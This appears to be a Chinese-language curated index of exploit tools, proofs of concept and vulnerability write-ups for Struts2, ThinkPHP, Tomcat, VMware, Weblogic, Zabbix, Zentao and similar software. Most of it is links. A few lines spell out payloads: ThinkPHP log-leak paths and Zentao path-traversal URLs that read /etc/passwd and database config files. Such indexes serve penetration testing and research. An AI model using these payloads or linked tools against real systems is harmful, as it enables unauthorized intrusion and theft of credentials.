[Struts漏洞源码](https://github.com/xhycccc/Struts2-Vuln-Demo)

[S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE](https://github.com/Wrin9/CVE-2021-31805)

[远程代码执行S2-062 CVE-2021-31805验证POC](https://github.com/YanMu2020/s2-062)

[Python2编写的struts2漏洞全版本检测和利用工具](https://github.com/Lucifer1993/struts-scan)

[Struts2 系列漏洞检查工具](https://github.com/shack2/Struts2VulsTools)

[Golang 版 Struts2 漏洞扫描利用工具](https://github.com/x51/STS2G)

[struts2绕过waf读写文件及另类方式执行命令](https://f0ng.github.io/2022/04/14/struts2绕过waf读写文件及另类方式执行命令/)

[Struts2漏洞扫描 Burp插件](https://github.com/novysodope/ST2Scanner)

[一款检测Struts2 RCE漏洞的burp被动扫描插件,仅检测url后缀为.do以及.action的数据包](https://github.com/x1a0t/Struts2Burp)

## ThinkAdmin

[ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现](https://blog.csdn.net/Adminxe/article/details/108744912)

[thinkAdmin框架0day](https://mp.weixin.qq.com/s?__biz=Mzg3NTk4MzY0MA==&mid=2247485677&idx=1&sn=3c2ae67b8958a0325701139210dd58e8)

## ThinkCMF

[ThinkCMF 任意内容包含getshell漏洞](https://www.hacking8.com/bug-web/ThinkCMF/ThinkCMF-框架上的任意内容包含漏洞.html)

[jas502n/ThinkCMF_getshell](https://github.com/jas502n/ThinkCMF_getshell)

## Thinkphp

[实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露](https://mp.weixin.qq.com/s/B9jkF0e0SMTJ6r09Syy-8A)

[thinkphp5 mysql账号密码泄露漏洞](https://mp.weixin.qq.com/s/R11Ha6ksbd7kslAuhyy73Q)

[ThinkPHP使用不当可能造成敏感信息泄露](https://blog.csdn.net/Fly_hps/article/details/81201904)

[https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ](https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ)

日志泄露

```
/Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变,比如 App
/Runtime/Logs/Home/16_09_06.log # 年份_月份_日期
/Runtime/Logs/User/16_09_06.log # 年份_月份_日期
```

[ThinkphpGUI](https://github.com/Lotus6/ThinkphpGUI)

[thinkphp6 session 任意文件创建漏洞复现 含POC](https://mp.weixin.qq.com/s/8k96KSpWMk7S4-_TzweXxg)

[一键 ThinkPHP 漏洞检测](https://github.com/Lucifer1993/TPscan)

[ thinkphp5 rce 漏洞检测工具](https://github.com/theLSA/tp5-getshell)

[-Thinkphp rce 扫描脚本,附带日志扫描](https://github.com/sukabuliet/ThinkphpRCE)

[tangxiaofeng7/TPScan](https://github.com/tangxiaofeng7/TPScan)

[ThinkPHP 漏洞 综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过](https://github.com/bewhale/thinkphp_gui_tools) -

## Tomcat

[拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马](https://github.com/ce-automne/TomcatMemShell)

[Apache Tomcat JMXProxy RCE](https://github.com/4ra1n/tomcat-jmxproxy-rce-exp)

[CVE-2022-26377:使用proxy_ajp对 Tomcat AJP 进行反向代理,可构造 AJP 数据包攻击后端服务](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)

[CVE-2022-29885:Apache Tomcat 集群服务Listener中的拒绝服务漏洞](https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/)

[用于扫描 Apache Tomcat 服务器漏洞的 python 脚本。](https://github.com/p0dalirius/ApacheTomcatScanner)

## TP-Link

[CVE-2022-25064 TP-LINK TL-WR840N RCE](https://github.com/Mr-xn/CVE-2022-25064)

## Ueditor

[百度Ueditor编辑器漏洞总结](https://mp.weixin.qq.com/s/mH4GWTVoCel4KHva-I4Elw)

[UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率](https://jianfensec.com/渗透测试/UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率/)

[九维团队-绿队(改进)| Java代码审计之SSRF](https://mp.weixin.qq.com/s/bF7wJpbN4BmvT8viWGW7hw)

[当ueditor遇到某盾](https://mp.weixin.qq.com/s/Lf3lMzlpBq7Vq5nDf_pUcw)

[Ueditor编辑器漏洞(文件上传)](https://www.jianshu.com/p/681162ed0374)

[theLSA/ueditor-getshell](https://github.com/theLSA/ueditor-getshell)

## Vmware

[CVE-2021-21974 VMWare ESXi RCE Exploit](https://github.com/Shadow0ps/CVE-2021-21974)

[CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)

[利用 VMWare Horizon 中的 CVE-2021-44228 进行远程代码执行等](https://github.com/puzzlepeaches/Log4jHorizon)

[SharpSphere](https://github.com/JamesCooteUK/SharpSphere)

[VMWare vRealize SSRF-CVE-2021-21975](https://github.com/Henry4E36/VMWare-vRealize-SSRF)

[Vmware vhost password decrypt](https://github.com/shmilylty/vhost_password_decrypt)

[CVE-2022-22972 的 POC 影响 VMware Workspace ONE、vIDM 和 vRealize Automation 7.6。](https://github.com/horizon3ai/CVE-2022-22972)

[.NET 攻击 vCenter 项目](https://github.com/JamesCooteUK/SharpSphere)

[从 vCenter 备份中提取 IdP 证书并以管理员身份登录的工具](https://github.com/horizon3ai/vcenter_saml_login)

[Vcenter Server CVE-2021-21985 RCE PAYLOAD](https://iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/)

[CVE-2021-21985 (Vulnerable Code)](https://github.com/alt3kx/CVE-2021-21985_PoC)

[VMware vCenter漏洞实战利用总结](https://www.ctfiot.com/39518.html)

[Vcenter实战利用方式总结](https://forum.butian.net/share/1893)

## VMware VRealize Network Insight

[VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)](https://github.com/sinsinology/CVE-2023-20887)

## Weblogic

[weblogic t3 deserialization rce](https://github.com/5up3rc/weblogic_cmd)

[适用于weblogic和Tomcat的无文件的内存马](https://github.com/keven1z/weblogic_memshell)

[Weblogic漏洞检测](https://github.com/0nise/weblogic-framework)

[CVE-2018-3245-PoC](https://github.com/pyn3rd/CVE-2018-3245)

[Weblogic一键漏洞检测工具,V1.5,更新时间:20200730](https://github.com/rabbitmask/WeblogicScan)

[About
WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)](https://github.com/KimJun1010/WeblogicTool)

[CVE-2020-14882&CVE-2020-14883 Weblogic未授权远程命令执行漏洞](https://www.cnblogs.com/liliyuanshangcao/p/13962160.html)

## Webmin

[KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc)

[vulhub/webmin/CVE-2019-15107/README.zh-cn.md](https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md)

[jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)

## Websphere

[IBM Websphere Portal - Persistent Cross-Site Scripting](https://www.exploit-db.com/exploits/36941)

[websphere_rce.py](https://github.com/Coalfire-Research/java-deserialization-exploits/blob/master/WebSphere/websphere_rce.py)

[websphereCVE-2015-7450](http://www.zstreamer.cn/2020/07/19/websphere-cve-2015-7450/)

[Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279)](https://xz.aliyun.com/t/6394)

[WebSphere XXE 漏洞分析(CVE-2020-4643)](https://paper.seebug.org/1342/)

[Turning bad SSRF to good SSRF: Websphere Portal](https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/)

## Wso2

[WSO2 RCE (CVE-2022-29464) 漏洞利用](https://github.com/hakivvi/CVE-2022-29464)

## XXL-JOB

[XXL-JOB 默认 accessToken 身份绕过漏洞](https://blog.csdn.net/qq_41904294/article/details/134201486)

[XXL-JOB 深度利用](https://mp.weixin.qq.com/s?__biz=MzkyNzYxMDQ2MQ==&mid=2247483934&idx=1&sn=2de580591b3a2a850560ffa6e62b4d01)

## Yii

[CVE-2020-15148 Yii2反序列化RCE POP链分析](https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA)

[Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses)

## Zabbix

[Zabbix Saml Bypass](https://github.com/Henry4E36/zabbix-saml-bypass)

[zabbix latest.php SQL注入漏洞 (CVE-2016-10134)](https://vulhub.org/#/environments/zabbix/CVE-2016-10134/)

[Zabbix sql注入漏洞复现(CVE-2016-10134)](https://mp.weixin.qq.com/s/Gi3NMbZcgMutE8mNqCmNAw)

[CVE-2020-11800 zabbix RCE漏洞细节披露](https://xz.aliyun.com/t/8991)

[CVE-2021-27927: Zabbix-CSRF-to-RCE](https://mp.weixin.qq.com/s/eyVwNKRfWpSGNA7Gq8KpWA)

[CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞分析与复现](https://mp.weixin.qq.com/s/-TAUjvdigi9TzjoPpMe1kw)

[Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131)

[CVE-2022-23134 Zabbix漏洞分析之二:从未授权访问到接管后台](https://mp.weixin.qq.com/s/jq2AvDlHCosb3zViPXGTaQ)

## Zentao

CNVD-2020-65242 后台任意文件下载

```
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file
```

后台 im 模块 downloadXxdPackage 函数任意文件下载

```
index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd
```

[Zentao v16.5 SQL Injection POC](https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go)

[禅道12.4.2后台管理员权限Getshell复现](https://mp.weixin.qq.com/s/Uak631OOC48WcshaYnvsRQ)